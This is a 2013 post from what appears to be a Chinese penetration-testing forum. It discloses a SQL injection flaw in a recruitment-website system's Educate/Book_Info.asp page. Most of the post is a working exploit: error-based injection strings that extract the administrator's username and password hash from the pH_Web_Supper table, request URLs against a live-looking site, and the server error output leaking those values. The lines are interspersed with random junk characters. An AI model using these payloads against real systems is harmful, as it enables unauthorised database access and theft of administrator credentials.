中国网络渗透测试联盟

标题: 网络求职招聘人才网站系统正式版漏洞 [打印本页]

作者: admin    时间: 2013-2-13 23:56
标题: 网络求职招聘人才网站系统正式版漏洞
漏洞出现在Educate/Book_Info.asp0 d8 e$ `2 ]! A$ s1 f/ b( |+ A
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出4 J6 q! i" Y% q) @. o  n
exp:如下# i9 `  @0 N% U$ Q5 W
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper); Y/ l8 u. E! x, c
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)+ t0 o6 ?  C  y& M# \  M( Z
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)1 D0 X- @( R' f7 j
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
! g. O" R+ ]' ?7 R4 W0 D将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。# n2 o5 v% x3 ~/ F9 @
/Educate/Book_Info.asp,行 8+ f* i6 C9 }, @$ M
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
5 J& {! K! D  o/ u6 b- JMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
' T+ `# J$ ~+ @# R! x, O将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
5 w, e0 P! i6 ^! ?/Educate/Book_Info.asp,行 8




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2